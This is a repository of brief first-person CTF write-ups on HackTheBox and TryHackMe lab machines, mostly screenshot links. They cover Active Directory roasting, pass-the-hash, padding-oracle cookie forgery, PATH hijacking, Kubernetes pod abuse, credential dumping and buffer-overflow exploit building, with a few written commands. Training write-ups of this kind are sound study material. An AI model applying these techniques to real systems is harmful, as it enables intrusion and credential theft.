├── README.md ├── intelligence.md ├── BluePrint.md ├── Buffer_Overflow_Prep.md ├── All_in_One.md ├── lazy.md ├── SteamCloud.md ├── sauna.md ├── Blackfield.md ├── Buffer_Overflow_Prep3.md ├── VulnNet: Roasted.md ├── heist.md ├── Validation.md └── DogCat.md /README.md: -------------------------------------------------------------------------------- 1 | # CTF-s 2 | **Github repository with Write Up, AutoPwn, Tools, Videos of CTF's from HackTheBox and TryHackMe** 3 | -------------------------------------------------------------------------------- /intelligence.md: -------------------------------------------------------------------------------- 1 | # INTELLIGENCE HACKTHEBOX 2 | 3 | **NMAP** 4 | 5 | ![image](https://user-images.githubusercontent.com/79543461/178701747-6f1041d1-9915-4a11-a9d1-94c80d58106b.png) 6 | 7 | -------------------------------------------------------------------------------- /BluePrint.md: -------------------------------------------------------------------------------- 1 | # BluePrint TryHackMe 2 | 3 | **DEMO** 4 | 5 | https://www.youtube.com/watch?v=xPyHRqLtvKM 6 | 7 | **Enumeration** 8 | 9 | **NMAP:** 10 | 11 | ![image](https://user-images.githubusercontent.com/79543461/176038077-11524be0-ae04-49fb-9dd2-aa4caf78aeb0.png) 12 | 13 | **Port 80** 14 | 15 | ![image](https://user-images.githubusercontent.com/79543461/176038136-08d2a6ad-4181-4977-8262-cb956c45cf5f.png) 16 | 17 | **Port 8080** 18 | 19 | ![image](https://user-images.githubusercontent.com/79543461/176038175-631d4017-fa46-4152-ad99-52ff29bc6415.png) 20 | 21 | **SearchSploit** 22 | 23 | I use the last exploit: 24 | 25 | ![image](https://user-images.githubusercontent.com/79543461/176038315-2a79ddba-c3b6-4fa5-a162-a3de553ab83c.png) 26 | 27 | **Explotation:** 28 | 29 | ![image](https://user-images.githubusercontent.com/79543461/176038370-bfea2380-2b12-4037-8007-236cbd01a308.png) 30 | 31 | **Root.txt** 32 | 33 | ![image](https://user-images.githubusercontent.com/79543461/176038434-a08f4630-f568-45e2-bb7a-9d3d98e0b651.png) 34 | 35 | Video WriteUP 36 | 37 | https://www.youtube.com/watch?v=xPyHRqLtvKM 38 | 39 | Thanks! 40 | -------------------------------------------------------------------------------- /Buffer_Overflow_Prep.md: -------------------------------------------------------------------------------- 1 | # TRYHACKME OVERFLOW 2 2 | 3 | **It's Windows 7 32 bits** 4 | 5 | fuzzer.py: 6 | 7 | ![image](https://user-images.githubusercontent.com/79543461/177651167-3cb08660-7165-46f8-b1f9-9541d8fe5f96.png) 8 | 9 | python3 fuzzer.py: 10 | 11 | ![image](https://user-images.githubusercontent.com/79543461/177651361-af07de68-fc30-4851-ab7c-1008109f9dae.png) 12 | 13 | Crash at 700 bytes 14 | 15 | I recomend use 300 bytes more to next step 700+300=1000 16 | 17 | ![image](https://user-images.githubusercontent.com/79543461/177653018-1f1f1f11-e2bf-4e7b-8942-8ce5f2509ad4.png) 18 | 19 | exploit.py: 20 | 21 | ![image](https://user-images.githubusercontent.com/79543461/177651633-8178015a-6530-4b00-9623-2115f1376e61.png) 22 | 23 | I put output from 1000 bytes in payload variable of exploit.py file. 24 | 25 | I run exploit 26 | 27 | ![image](https://user-images.githubusercontent.com/79543461/177652086-ef416a63-1b49-4532-8291-4fa73842899c.png) 28 | 29 | I copy EIP: 30 | 31 | ![image](https://user-images.githubusercontent.com/79543461/177653961-c7d4ef8f-abd0-44e0-be75-c8bc00b08952.png) 32 | 33 | msf-pattern_offset -l 1000 -q 76413176 34 | 35 | ![image](https://user-images.githubusercontent.com/79543461/177728070-a400c61b-93fe-45cf-b8da-851c8b1489fa.png) 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /All_in_One.md: -------------------------------------------------------------------------------- 1 | # All in One TryHackMe 2 | 3 | **Enumeration** 4 | 5 | **NMAP:** 6 | 7 | ![image](https://user-images.githubusercontent.com/79543461/176627219-4868d7a9-a24f-48e6-9552-dc55ae266062.png) 8 | 9 | **FTP** 10 | 11 | Access Anonymous is Accepted 12 | 13 | ![image](https://user-images.githubusercontent.com/79543461/176627497-0354df83-7b31-4445-9dcb-37ec3e80a19a.png) 14 | 15 | **Dirbuster** 16 | 17 | ![image](https://user-images.githubusercontent.com/79543461/176627592-9df38d87-46d6-4106-bc04-07708c0836cb.png) 18 | 19 | Wordpress Found!! 20 | 21 | ![image](https://user-images.githubusercontent.com/79543461/176627691-e0a05336-9f21-4297-bf25-0e12dae4f28f.png) 22 | 23 | **WPScan** 24 | 25 | ![image](https://user-images.githubusercontent.com/79543461/176627933-10ae035b-a5af-4c1e-8f6e-91e9f4726e6d.png) 26 | 27 | One User: 28 | 29 | ![image](https://user-images.githubusercontent.com/79543461/176628235-66e9c816-ac12-41b7-ae5c-210184bba575.png) 30 | 31 | I found 3 Plugins 32 | 33 | ![image](https://user-images.githubusercontent.com/79543461/176633315-2578608b-b888-47ed-a658-521272f20bfc.png) 34 | 35 | **SearcSploit** 36 | 37 | ![image](https://user-images.githubusercontent.com/79543461/176638844-884fc173-163f-4f68-9fca-c4abda6e99c6.png) 38 | 39 | I see code from python exploit 40 | 41 | ![image](https://user-images.githubusercontent.com/79543461/176638952-ccca1a88-f72b-4c86-a656-00f521a188dc.png) 42 | 43 | I try this payload: 44 | 45 | ![image](https://user-images.githubusercontent.com/79543461/176639040-a784f606-373f-4f18-b691-b571b7b1bc2e.png) 46 | 47 | I have LFI!!! 48 | 49 | -------------------------------------------------------------------------------- /lazy.md: -------------------------------------------------------------------------------- 1 | # LAZY HACTHEBOX 2 | 3 | **NMAP** 4 | 5 | ![image](https://user-images.githubusercontent.com/79543461/181914220-c170b5ef-4497-4782-a850-ee64e2866856.png) 6 | 7 | In images directory i found this image: 8 | 9 | ![image](https://user-images.githubusercontent.com/79543461/181914359-4f48a689-911d-4b69-b40f-7c43babe1117.png) 10 | 11 | I don't find ANYTHING... 12 | 13 | But at one point I decide to see cookies, I see a cookie saved with the name auth, I'm going to try to change the cookie with the Burpsuite repeater and I get this error "Invalid Padding"... 14 | 15 | Looks like a Padding Oracle Attack i try with Padbuster 16 | 17 | **PADBUSTER** 18 | 19 | https://github.com/AonCyberLabs/PadBuster 20 | 21 | ![image](https://user-images.githubusercontent.com/79543461/181920832-d23d94ef-48e4-40b0-92ab-614fb957a17d.png) 22 | 23 | It seems that this is it! 24 | 25 | ![image](https://user-images.githubusercontent.com/79543461/181920870-f559dd10-cd40-4844-bfe2-cb76c21edb74.png) 26 | 27 | DONE :) 28 | 29 | It's the moment to create the cookie for admin user: 30 | 31 | ![image](https://user-images.githubusercontent.com/79543461/181921102-dd9bb793-28ad-48f1-a013-3a6a4d3e72ba.png) 32 | 33 | I have the cookie! 34 | 35 | ![image](https://user-images.githubusercontent.com/79543461/181921111-7104b501-7014-4119-99e4-4c20f9765462.png) 36 | 37 | I put in request and... 38 | 39 | ![image](https://user-images.githubusercontent.com/79543461/181921172-4ddc9da5-fdad-4517-8d4a-bc6b5a510453.png) 40 | 41 | I'm in Admin account i have SSH id_rsa: 42 | 43 | ![image](https://user-images.githubusercontent.com/79543461/181921202-16659575-dc80-411a-9c09-8db75c278998.png) 44 | 45 | I try to connect with SSH: 46 | 47 | ![image](https://user-images.githubusercontent.com/79543461/182016999-560c11a4-2784-452a-85cf-87389c4bc4c0.png) 48 | 49 | I can execute script named backup with root permisions 50 | 51 | I see string from this script and i see cat /etc/shadow 52 | 53 | This is Path Hijacking... 54 | 55 | cd /tmp 56 | 57 | nano cat 58 | 59 | ![image](https://user-images.githubusercontent.com/79543461/182017810-0daddfc5-52cb-4d7f-9bdb-c46aac590166.png) 60 | 61 | ![image](https://user-images.githubusercontent.com/79543461/182017832-5ad76730-7fe4-4423-8e6d-9f2e5eed72e4.png) 62 | 63 | I execute and i have root shell. 64 | 65 | THANKS. 66 | 67 | -------------------------------------------------------------------------------- /SteamCloud.md: -------------------------------------------------------------------------------- 1 | # SteamCloud HACKTHEBOX 2 | 3 | **ENUMERATION** 4 | 5 | **NMAP** 6 | 7 | ![image](https://user-images.githubusercontent.com/79543461/179359903-10aab520-7f53-4057-8c5e-eaefd152cb4f.png) 8 | 9 | When you can see this is a kubernetes machines 10 | 11 | **Let's try to use kubectl** 12 | 13 | ![image](https://user-images.githubusercontent.com/79543461/179359961-cab6cb56-0ff2-492e-80fb-a9d2226faa19.png) 14 | 15 | I don't have credentials. 16 | 17 | **Let's try with kubeletctl** 18 | 19 | ![image](https://user-images.githubusercontent.com/79543461/179360830-ecb6cb85-1f76-4371-bd33-fe68567ef374.png) 20 | 21 | Nice i recivied pods from Kubelets 22 | 23 | I try to gain RCE in any pod 24 | 25 | ![image](https://user-images.githubusercontent.com/79543461/179361941-7ac48c14-b455-49e9-8f88-006a0bd81f7b.png) 26 | 27 | Nginx and Kube-Proxy are injectables 28 | 29 | I try with nginx and next Kube-Proxy 30 | 31 | I have shell in nginx! 32 | 33 | ![image](https://user-images.githubusercontent.com/79543461/179361993-8aa44ce9-845a-401f-924d-17dc3bcf0488.png) 34 | 35 | **Hacktricks** 36 | 37 | https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/kubernetes-enumeration 38 | 39 | ![image](https://user-images.githubusercontent.com/79543461/179362094-7e69420c-5e7c-4c55-836e-8e95f3d64d0f.png) 40 | 41 | I try to see Token an Certificate 42 | 43 | I have all: 44 | 45 | ![image](https://user-images.githubusercontent.com/79543461/179362142-377dfa45-cb23-47a3-b3f2-18cdc9a3c5f0.png) 46 | 47 | **Look that** 48 | 49 | ![image](https://user-images.githubusercontent.com/79543461/179362729-f5f3f120-0dc8-4071-9955-aae31c7e2969.png) 50 | 51 | **Let's list privilieges** 52 | 53 | ![image](https://user-images.githubusercontent.com/79543461/179362874-ddf661e6-8be3-418b-b63f-4fb7924b1aa5.png) 54 | 55 | I can create new pod!! 56 | 57 | I copy same structuere 58 | 59 | ![image](https://user-images.githubusercontent.com/79543461/179364596-8e746a8b-c2b0-48b4-972d-3445f87f76f0.png) 60 | 61 | ![image](https://user-images.githubusercontent.com/79543461/179364830-31c62ba5-7568-42e6-bf31-dda8ed8415f6.png) 62 | 63 | I comprove: 64 | 65 | ![image](https://user-images.githubusercontent.com/79543461/179364870-00bbfc88-f43b-4e44-a9d8-0f6a5e662cbc.png) 66 | 67 | **Perfect!!** 68 | 69 | I gain shell: 70 | 71 | ![image](https://user-images.githubusercontent.com/79543461/179364984-fb10ac6d-948b-4dec-b90e-0c05bfddcba3.png) 72 | 73 | ![image](https://user-images.githubusercontent.com/79543461/179364998-e5f9ee10-3d79-4a7a-a97a-ee877e4cd927.png) 74 | 75 | DONE :) 76 | -------------------------------------------------------------------------------- /sauna.md: -------------------------------------------------------------------------------- 1 | # SAUNA HACKTHEBOX 2 | 3 | **DEMO** 4 | 5 | https://youtu.be/KEU1l4OyYZ8 6 | 7 | **ENUMERATION** 8 | 9 | **NMAP** 10 | 11 | ![image](https://user-images.githubusercontent.com/79543461/178007053-6ad5df2a-9c74-4d28-bd2f-3cabb359a315.png) 12 | 13 | **Kerberos User Enum** 14 | 15 | ![image](https://user-images.githubusercontent.com/79543461/178008296-118c1989-4b68-4af3-b127-e9d4683832fd.png) 16 | 17 | **User fsmith don't need password let's go to crack it!** 18 | 19 | ![image](https://user-images.githubusercontent.com/79543461/178009159-487a2451-d289-460c-98ad-701227b7710e.png) 20 | 21 | I copy hash you can see in last screenshoot and i put in hash file. 22 | 23 | ![image](https://user-images.githubusercontent.com/79543461/178009567-be7efa7d-8d29-4974-80ea-190889c72c35.png) 24 | 25 | **I have first credentials!** 26 | 27 | Comprove credentials: 28 | 29 | ![image](https://user-images.githubusercontent.com/79543461/178010039-eba0242d-d146-4091-93fb-b3190c221646.png) 30 | 31 | **Let's go!!** 32 | 33 | SecretsDump don't work: 34 | 35 | ![image](https://user-images.githubusercontent.com/79543461/178010706-3463db86-1805-4484-8d3e-0a7d7f7f2740.png) 36 | 37 | **GetUsersSPN** 38 | 39 | ![image](https://user-images.githubusercontent.com/79543461/178011276-71ebf1fe-9ee0-45c9-bb13-16ba6b854046.png) 40 | 41 | This means i can generate a ticket for user hsmith 42 | 43 | ![image](https://user-images.githubusercontent.com/79543461/178012090-2b39e6e7-8c28-4967-9dd6-3dc63ef05094.png) 44 | 45 | But no works 46 | 47 | **It's moment to connect to winrm** 48 | 49 | ![image](https://user-images.githubusercontent.com/79543461/178015837-e4f3ac11-f972-4f01-8745-639262b9eec5.png) 50 | 51 | I run WinPEASx64.exe, i recomended this tool, its amazing: https://github.com/carlospolop/PEASS-ng/ 52 | 53 | I found credentials with WinPEAS. 54 | 55 | ![image](https://user-images.githubusercontent.com/79543461/178027809-3c8c16c5-5044-41a5-8e19-ae7f520b8e57.png) 56 | 57 | Put the real username and the credentials are valid. 58 | 59 | ![image](https://user-images.githubusercontent.com/79543461/178029545-36c85bd2-c94e-4d61-b00d-6982e05420ab.png) 60 | 61 | I use secretsdump: 62 | 63 | ![image](https://user-images.githubusercontent.com/79543461/178029960-de3c5f48-7c3f-4be3-866f-71f3116cd326.png) 64 | 65 | **WORKS!!!** 66 | 67 | I try to do Pass the Hash with admin account. 68 | 69 | ![image](https://user-images.githubusercontent.com/79543461/178030220-d2555101-61d5-46ea-98d1-23435e92e5b9.png) 70 | 71 | **PWNED!!** 72 | 73 | ![image](https://user-images.githubusercontent.com/79543461/178030411-ef9a1287-ae9f-4f3d-9ba6-3605757db265.png) 74 | 75 | DONE 76 | 77 | **DEMO** 78 | 79 | https://youtu.be/KEU1l4OyYZ8 80 | 81 | Thanks 82 | 83 | -------------------------------------------------------------------------------- /Blackfield.md: -------------------------------------------------------------------------------- 1 | # Blackfield HACKTHEBOX 2 | 3 | **Enumeration** 4 | 5 | **NMAP** 6 | 7 | ![image](https://user-images.githubusercontent.com/79543461/184364952-5f4b8a18-fdb9-4625-8017-c6ab7e78cfcf.png) 8 | 9 | **AD ENUM** 10 | 11 | My own tool: 12 | https://github.com/S12cybersecurity/AD-Pentest 13 | 14 | I try to get users from this domain with module users 15 | 16 | ![image](https://user-images.githubusercontent.com/79543461/184396085-66a596a9-02d5-4e2e-9ba8-d958326c46bb.png) 17 | 18 | RPC Blocked but LookUPSID works!! 19 | 20 | ![image](https://user-images.githubusercontent.com/79543461/184399086-71a6ac71-fea8-4819-9e20-36db50a5eb36.png) 21 | 22 | ASREPRoasting attack!! 23 | 24 | I have credentials: 25 | 26 | ![image](https://user-images.githubusercontent.com/79543461/184400122-3b1c29d2-2727-4138-b610-bc1e816fc455.png) 27 | 28 | I can't access with EVIL-WINRM, i need BloudHound: 29 | 30 | **Bloodhound** 31 | 32 | ![image](https://user-images.githubusercontent.com/79543461/184404307-26ead43c-6e0e-4ee5-a53b-599077afd4f2.png) 33 | 34 | I upload in bloodhound GUI: 35 | 36 | ![image](https://user-images.githubusercontent.com/79543461/184404476-530943ae-fa42-4682-a02d-96c54441313e.png) 37 | 38 | I put my user: 39 | 40 | ![image](https://user-images.githubusercontent.com/79543461/184404533-c956644f-686d-4dd4-a968-f71b577d5b43.png) 41 | 42 | I can change password to audit2020 user: 43 | 44 | ![image](https://user-images.githubusercontent.com/79543461/184408474-0f3bd0e8-7f6d-4620-8a75-8c624ca1f312.png) 45 | 46 | ![image](https://user-images.githubusercontent.com/79543461/184408771-13b7c320-5b64-44a1-abaa-ac3bc347f7a2.png) 47 | 48 | New password is 'Password123' 49 | 50 | ![image](https://user-images.githubusercontent.com/79543461/184409540-fbde289f-d338-44dc-9bd2-476c16e5d8c0.png) 51 | 52 | I found new SMB Folders 53 | 54 | ![image](https://user-images.githubusercontent.com/79543461/184410794-7ab05878-0504-44f6-b634-801465d61df8.png) 55 | 56 | I found one interesting file named lsass.zip 57 | 58 | ![image](https://user-images.githubusercontent.com/79543461/184410882-2581ae2c-5039-457b-9b0b-87cec344190a.png) 59 | 60 | I run pypykatz and i found hash 61 | 62 | ![image](https://user-images.githubusercontent.com/79543461/184410949-b04c6fc6-92fc-473b-a516-fd9273929571.png) 63 | 64 | I can connect with evil-winrm 65 | 66 | ![image](https://user-images.githubusercontent.com/79543461/184411071-2de4199a-15d9-4dcd-8495-4238d00f7591.png) 67 | 68 | I have user.txt 69 | 70 | ![image](https://user-images.githubusercontent.com/79543461/184411189-d8bfcb47-4daa-401c-bd4d-bc0958d94dd2.png) 71 | 72 | Privilieges... 73 | 74 | ![image](https://user-images.githubusercontent.com/79543461/184411327-56e8da27-d5f5-4817-823f-683180acbc33.png) 75 | 76 | PERFECT!! SeBackupPriviliege... 77 | 78 | ![image](https://user-images.githubusercontent.com/79543461/184412273-ec5e4530-e6a5-437b-a19a-a39cf65b776b.png) 79 | 80 | -------------------------------------------------------------------------------- /Buffer_Overflow_Prep3.md: -------------------------------------------------------------------------------- 1 | # TRYHACKME OSCP PREP 3 2 | 3 | **Offset** 4 | 5 | fuzzer.py 6 | 7 | ![image](https://user-images.githubusercontent.com/79543461/177730350-66a7811c-44d7-4f89-b015-ace1ea60172b.png) 8 | 9 | Crash: 10 | 11 | ![image](https://user-images.githubusercontent.com/79543461/177730238-49e5bdcf-a101-4119-9b4d-9b1de2b996d3.png) 12 | 13 | Program crash with 1300 14 | 15 | I recommend put 400 bytes more than crasher. 16 | 17 | Create pattern: 18 | 19 | ![image](https://user-images.githubusercontent.com/79543461/177731933-3d132cda-40a4-46b6-9198-c7797411e00a.png) 20 | 21 | Put in payload of exploit.py: 22 | 23 | ![image](https://user-images.githubusercontent.com/79543461/177732035-764d9a45-717f-47fc-a7b9-08e64ba69b32.png) 24 | 25 | Offset Discover 26 | 27 | ![image](https://user-images.githubusercontent.com/79543461/177731773-026d3fd9-4fad-4564-9ca5-f88615844f3a.png) 28 | 29 | Let's put EIP Register with BBBB its same than 42424242 in Hex. 30 | 31 | ![image](https://user-images.githubusercontent.com/79543461/177735597-d290fd18-2a0c-4b02-bd27-cffe155dda81.png) 32 | 33 | I run exploit: 34 | 35 | ![image](https://user-images.githubusercontent.com/79543461/177736959-02e6a8cf-6e5f-4e62-80c2-105709421b9a.png) 36 | 37 | **BadChars** 38 | 39 | !mona bytearray -b "\x00" 40 | 41 | ![image](https://user-images.githubusercontent.com/79543461/177737428-e47a158d-7692-4216-becc-b74d5f379552.png) 42 | 43 | I put payload in exploit.py: 44 | 45 | ![image](https://user-images.githubusercontent.com/79543461/177737862-70f73c89-7797-4a31-a069-68dff9cfa191.png) 46 | 47 | I run exploit: 48 | 49 | !mona compare -a esp -f bytearray.bin 50 | 51 | ![image](https://user-images.githubusercontent.com/79543461/177738334-07d1d860-b0a5-4183-8bab-3c5bd5a82a27.png) 52 | 53 | BadChars are: 54 | 55 | \x00\x11\x40\x5f\xb8\xee 56 | 57 | Comprove: 58 | 59 | !mona bytearray -b "\x00\x11\x40\x5f\xb8\xee" 60 | 61 | I put in exploit and i run exploit: 62 | 63 | 0 badchars!! 64 | 65 | ![image](https://user-images.githubusercontent.com/79543461/177740166-d6d5c807-7d29-4ea6-879f-acb6e84e23f8.png) 66 | 67 | !mona jmp -r esp -cbq "\x00\x11\x40\x5f\xb8\xee" 68 | 69 | I choose first jmp: 70 | 71 | ![image](https://user-images.githubusercontent.com/79543461/177740586-5691c8fa-f8e8-42d5-9e5a-7fe840ab72cb.png) 72 | 73 | I put in retn with little-endian: 74 | 75 | ![image](https://user-images.githubusercontent.com/79543461/177741115-8292ab02-5905-4af6-b614-27addd946059.png) 76 | 77 | ![image](https://user-images.githubusercontent.com/79543461/177741351-ccfb9f8f-d016-4885-a2ac-53a2e90dccc1.png) 78 | 79 | I copy new payload in my exploit 80 | 81 | Add padding: 82 | 83 | ![image](https://user-images.githubusercontent.com/79543461/177741821-7faf314b-6b37-498a-8f94-49d838f31fdc.png) 84 | 85 | I put listener: 86 | 87 | ![image](https://user-images.githubusercontent.com/79543461/177741956-13d45983-843e-4e1c-b578-8b47f42888db.png) 88 | 89 | I run exploit: 90 | 91 | ![image](https://user-images.githubusercontent.com/79543461/177742480-b89f0938-3c94-4a53-b1d4-6930e96c88aa.png) 92 | 93 | DONE :) 94 | -------------------------------------------------------------------------------- /VulnNet: Roasted.md: -------------------------------------------------------------------------------- 1 | ## VulnNet: Roasted: 2 | 3 | **Video Demo:** 4 | 5 | https://www.youtube.com/watch?v=5x76bdWU3q0 6 | 7 | ****ENUMERATION**** 8 | 9 | **NMAP:** 10 | 11 | I run NMAP to see all port in state open are in this machine: 12 | 13 | ![image](https://user-images.githubusercontent.com/79543461/175721449-95047f5c-dd39-4894-b5d0-0921391abda2.png) 14 | 15 | **Kerbrute User Enum:** 16 | 17 | I use UserEnum Module from Kerbrute to Enumerate users via Kerberos Open Service 18 | 19 | ![image](https://user-images.githubusercontent.com/79543461/175765882-a3e1b6fb-5aee-4ae0-a907-0c044979ffc4.png) 20 | 21 | **Samba:** 22 | 23 | I need to Enumerate de Shared Resources From This Domain. 24 | 25 | ![image](https://user-images.githubusercontent.com/79543461/175766359-e330d34e-0e87-427f-b195-36a9f462a0ff.png) 26 | 27 | And This is Interesting, when machine have SMB open and IPC$ Open with Minium Read Access it's vulnerable to other User Enumeration. 28 | 29 | Let's Go to See The Permisions of IPC$ with smbmap: 30 | 31 | ![image](https://user-images.githubusercontent.com/79543461/175766561-0a71ddff-470b-4c54-be8d-92ecbeca3717.png) 32 | 33 | Read Permisions!!! 34 | 35 | Let's Go to Enumerate Users: 36 | 37 | ![image](https://user-images.githubusercontent.com/79543461/175766742-f4fd3548-f094-45c9-92e1-48ee1323211c.png) 38 | 39 | I put Only UserNames in the file users.txt 40 | 41 | ![image](https://user-images.githubusercontent.com/79543461/175767545-87cbbf76-64f5-4957-9124-61217876c426.png) 42 | 43 | Now i go to see if any user don't have a good security authentication. 44 | 45 | **GetNPUsers:** 46 | 47 | ![image](https://user-images.githubusercontent.com/79543461/175768575-c0c284fb-322e-4a9f-8966-53bb8416958b.png) 48 | 49 | User "t-skid" have UF_DONT_REQUIRE_PREAUTH set!! 50 | 51 | **John The Ripper** 52 | 53 | ![image](https://user-images.githubusercontent.com/79543461/175768653-af07e116-b531-4892-96f1-57b876577d9f.png) 54 | 55 | **Samba With t-skid User:** 56 | 57 | ![image](https://user-images.githubusercontent.com/79543461/175768898-4373df8b-5000-4d58-94d3-b58c10331cf4.png) 58 | 59 | I enter to NETLOGON: 60 | 61 | ![image](https://user-images.githubusercontent.com/79543461/175768978-9faae125-2b8c-4ba7-9768-6ede418dd2d0.png) 62 | 63 | **ResetPassword.vbs** 64 | 65 | ![image](https://user-images.githubusercontent.com/79543461/175769081-19b57b0e-e497-4cea-aa5d-53cd0201334b.png) 66 | 67 | Credentials founded for a-whitehat User 68 | 69 | Let's Go to Connect Via evil-winrm: 70 | 71 | ![image](https://user-images.githubusercontent.com/79543461/175770420-5e5f6b5e-cebe-4754-881f-894dc301e2dc.png) 72 | 73 | I found User Flag: 74 | 75 | ![image](https://user-images.githubusercontent.com/79543461/175770537-e11f396e-185f-4fea-8544-69bde1e8c34a.png) 76 | 77 | **Secrets Dump** 78 | 79 | ![image](https://user-images.githubusercontent.com/79543461/175770846-f9a2a665-c565-4444-9cfb-7aa43153f128.png) 80 | 81 | I have Admin Hash, Let's Go to the Pass The Hash with Admin Account: 82 | 83 | 84 | Works!!! 85 | 86 | **Root Flag** 87 | 88 | ![image](https://user-images.githubusercontent.com/79543461/175770952-6db39efc-c340-4827-96d1-1b940c748972.png) 89 | 90 | Thanks! 91 | 92 | **Demo:** 93 | 94 | https://www.youtube.com/watch?v=5x76bdWU3q0 95 | 96 | -------------------------------------------------------------------------------- /heist.md: -------------------------------------------------------------------------------- 1 | # HEIST HACKTHEBOX 2 | 3 | **ENUMERATION** 4 | 5 | **NMAP** 6 | 7 | ![image](https://user-images.githubusercontent.com/79543461/184477884-22fc3ac3-08df-410f-b1c7-0e7bb103b35c.png) 8 | 9 | **WEB** 10 | 11 | ![image](https://user-images.githubusercontent.com/79543461/184477942-a4541eca-b461-41e4-b2e9-8d6d5a51319c.png) 12 | 13 | I login as guest 14 | 15 | ![image](https://user-images.githubusercontent.com/79543461/184477955-b930c622-818e-4b71-b89f-eb1b460606a9.png) 16 | 17 | I see this messages talking about problems with cisco router 18 | 19 | ![image](https://user-images.githubusercontent.com/79543461/184478061-4c62dca4-7efe-42d2-b2db-f52ff6451b74.png) 20 | 21 | If you click in Attachment you can see intersting things: 22 | 23 | ![image](https://user-images.githubusercontent.com/79543461/184477979-133fdad0-8660-4454-b704-7ddc69b77f5d.png) 24 | 25 | I copy and save this to my machine and i clone this repository to deecrypt cisco passwords: 26 | 27 | https://github.com/theevilbit/ciscot7 28 | 29 | I crack very easy the passwords: 30 | 31 | ![image](https://user-images.githubusercontent.com/79543461/184478161-df18ce8c-a7ab-48f0-94ba-025963046827.png) 32 | 33 | This are the credentials: 34 | 35 | ![image](https://user-images.githubusercontent.com/79543461/184478220-7ce78dc2-02bf-4c10-9dd8-7118347fc4ad.png) 36 | 37 | I create users.txt file with hazard (user from forum) admin (file) rout3r (file) 38 | 39 | And i create a passwords.txt witw both cracked passwords 40 | 41 | Password Spryng: 42 | 43 | ![image](https://user-images.githubusercontent.com/79543461/184478405-5ff3168a-6a79-4637-a04a-111c883476d8.png) 44 | 45 | 0 results... 46 | 47 | I go back to Hazard file and i see other hash: 48 | 49 | ![image](https://user-images.githubusercontent.com/79543461/184478441-a81f4ab1-0c49-47a4-8ced-b53ac8ac5135.png) 50 | 51 | I try to crack it: 52 | 53 | ![image](https://user-images.githubusercontent.com/79543461/184478452-f6a005f3-b7c5-45cc-906e-41381d12b2eb.png) 54 | 55 | Perfect, now i put in passwords file and i try other Password Sprying: 56 | 57 | ![image](https://user-images.githubusercontent.com/79543461/184478572-fa610160-d9b3-4659-8486-15d0c98e6243.png) 58 | 59 | PERFECT!! I have credentials! 60 | 61 | I try crackmapexec to test winrm to access to victim local machine bur anytthing: 62 | 63 | ![image](https://user-images.githubusercontent.com/79543461/184478646-743ab519-f723-498d-83cc-ca7677d5f42e.png) 64 | 65 | New Resources: 66 | 67 | ![image](https://user-images.githubusercontent.com/79543461/184478684-cbdfb79f-2192-4f8d-a75e-f24eb1da45f4.png) 68 | 69 | I can't access to RPC 70 | 71 | But i have Read Permisions in IPC$ share smb resource 72 | 73 | I can enumerate users with lookupsid.py from impacket python library 74 | 75 | ![image](https://user-images.githubusercontent.com/79543461/184478860-8569e32c-59db-4ac9-bf5b-b5638a717ced.png) 76 | 77 | I do this regular expresion to save users in users.txt file: 78 | 79 | ![image](https://user-images.githubusercontent.com/79543461/184478918-736aac75-7937-45f6-b09a-b9bab310d91c.png) 80 | 81 | I try other password spying and... 82 | 83 | ![image](https://user-images.githubusercontent.com/79543461/184478943-83a7a661-11dd-49c2-98d9-bf2e4126f8c8.png) 84 | 85 | I have credentials to Chase user: 86 | 87 | ![image](https://user-images.githubusercontent.com/79543461/184478974-96c54d98-4964-4cdd-80e2-88b7d0738215.png) 88 | 89 | I can access with evil-winrm to victim machine! 90 | 91 | ![image](https://user-images.githubusercontent.com/79543461/184479022-e7afeca2-eb30-4695-ac28-b2d53aee42f8.png) 92 | 93 | I find this processes for firefox 94 | 95 | ![image](https://user-images.githubusercontent.com/79543461/184479322-9232d923-39b0-47ac-8152-fa15cae9f8ba.png) 96 | 97 | I try to use procdump for 64 bits 98 | 99 | I download from here: 100 | https://docs.microsoft.com/en-us/sysinternals/downloads/procdump 101 | 102 | I upload to victim machine 103 | 104 | ![image](https://user-images.githubusercontent.com/79543461/184479416-c9f9962a-d2f8-43c2-8bf9-4bad1748d133.png) 105 | 106 | I search firefox process: 107 | 108 | ![image](https://user-images.githubusercontent.com/79543461/184479477-7b66042a-1720-4730-b5dc-16ad2caf6dbf.png) 109 | 110 | I have dumped 111 | 112 | ![image](https://user-images.githubusercontent.com/79543461/184479620-62d18569-9174-4a89-91db-0c6141a858f9.png) 113 | 114 | I start to download this to my kali machine. 115 | 116 | I do strings and i found password: 117 | 118 | ![image](https://user-images.githubusercontent.com/79543461/184479980-09781c6a-5711-44b2-a063-4df6a3028bde.png) 119 | 120 | I have admin Creds!! 121 | 122 | PWNED!! 123 | 124 | ![image](https://user-images.githubusercontent.com/79543461/184480073-6964469c-53d0-4e29-b991-871a8e6eb16e.png) 125 | 126 | THANKS! 127 | 128 | Video for this in this youtube channel: 129 | 130 | https://www.youtube.com/channel/UCmMvgBYm3m53losIj2pE9jA 131 | -------------------------------------------------------------------------------- /Validation.md: -------------------------------------------------------------------------------- 1 | # Validation HacktheBox 2 | 3 | **DEMO** 4 | 5 | https://youtu.be/f8WEvvKZM8s 6 | 7 | **ENUMERATION** 8 | 9 | **NMAP** 10 | 11 | ![image](https://user-images.githubusercontent.com/79543461/177142512-ca4b0e81-c4bd-4cae-a65e-6dc6976a7242.png) 12 | 13 | **Port 80** 14 | 15 | ![image](https://user-images.githubusercontent.com/79543461/177142701-0be496f1-60ba-4fed-871d-836ca8352fb7.png) 16 | 17 | **Port 4566** 18 | 19 | ![image](https://user-images.githubusercontent.com/79543461/177142777-127ce58a-10c2-4d35-99cd-904be4e79abd.png) 20 | 21 | **Port 8080** 22 | 23 | ![image](https://user-images.githubusercontent.com/79543461/177142844-5600bb65-4f47-4ae9-8d4c-e20eaca2a966.png) 24 | 25 | I enumerate Port 80: 26 | 27 | ![image](https://user-images.githubusercontent.com/79543461/177143065-83faf0c0-e186-40e3-aac5-4011e709f972.png) 28 | 29 | **First Attack Vectors** 30 | 31 | The index page of this web it's a form to qualify for something called September UHC, let's try to inject code SQL,XSS,HTML and more. 32 | 33 | **XSS** 34 | 35 | Payload: 36 | 37 | ![image](https://user-images.githubusercontent.com/79543461/177160817-3203a467-57bd-4bb6-ab4a-50d45508fc1c.png) 38 | 39 | **It's Vulnerable to XSS and HTML Injection, but i can't do anything** 40 | 41 | **SQLI** 42 | 43 | **BurpSuite** 